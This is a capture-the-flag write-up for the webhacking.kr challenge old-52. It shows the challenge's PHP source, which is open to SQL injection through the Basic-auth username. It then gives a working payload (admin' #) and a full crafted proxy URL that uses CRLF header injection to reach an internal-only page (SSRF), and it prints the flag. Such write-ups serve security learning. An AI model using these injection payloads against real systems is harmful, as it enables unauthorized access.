old-52 -- SQLi + SSRF

URLs:

Challenge: http://webhacking.kr:10008
Proxy: http://webhacking.kr:10008/proxy.php
Admin: http://webhacking.kr:10008/admin/
- Source: http://webhacking.kr:10008/admin/?view_source=1

/admin asks for credentials. guest:guest can be used for auth.

Source:

<?php
include "config.php";
if ($_GET["view_source"]) { view_source(); }
if ($_GET["logout"] == 1) { $_SESSION["login"] = ""; exit("<script>location.href='./';</script>"); }
if ($_SESSION["login"]) {
    echo "hi {$_SESSION["login"]}<br>";
    if ($_SESSION["login"] == "admin") {
        if (preg_match("/^172\.17\.0\./", $_SERVER["REMOTE_ADDR"])) { echo $flag; } 
        else { echo "Only access from virtual IP address"; }
    } else {
        echo "You are not admin";
    }
    echo "<br><a href=./?logout=1>[logout]</a>";
    exit();
}
if (!$_SESSION["login"]) {
    if (preg_match("/logout=1/", $_SERVER["HTTP_REFERER"])) {
        header('WWW-Authenticate: Basic realm="Protected Area"');
        header("HTTP/1.0 401 Unauthorized");
    }
    if ($_SERVER["PHP_AUTH_USER"]) {
        $id = $_SERVER["PHP_AUTH_USER"];
        $pw = $_SERVER["PHP_AUTH_PW"];
        $pw = md5($pw);
        $db = dbconnect();
        $query = "select id from member where id='{$id}' and pw='{$pw}'";
        $result = mysqli_fetch_array(mysqli_query($db, $query));
        if ($result["id"]) {
            $_SESSION["login"] = $result["id"];
            exit("<script>location.href='./';</script>");
        }
    }
    if (!$_SESSION["login"]) {
        header('WWW-Authenticate: Basic realm="Protected Area"');
        header("HTTP/1.0 401 Unauthorized");
        echo "Login Fail";
    }
}
?><hr><a href=./?view_source=1>view-source</a>

Proxy is a bit friendlier: http://webhacking.kr:10008/proxy.php?page=/admin/

First we need to become admin, and since there's no validation on SQL query it's easily by passable like admin' #:uwu (username:password format)

But we can't access the flag, because only internal services can. That's where the Proxy comes in. We are allowed to specify the path, but it's also not sanitized so we are able to inject new headers.

Start cooking in CyberChef, Recipe should look like this:

http://webhacking.kr:10008/proxy.php?page=/admin/%20HTTP/1.1%0D%0AAuthorization:%20Basic%20YWRtaW4nICM6dXd1%0D%0ACookie:%20PHPSESSID=hi4uvai5sde90encr0ktq6879f%0D%0AUser-Agent:

Flag: FLAG{Server_Side_Request_Forgery_with_proxy!}

Previousold-51 -- SQLi (Binary MD5)Nextold-53 -- SQLi (MySQL PROCEDURE ANALYSE)

Last updated 7 months ago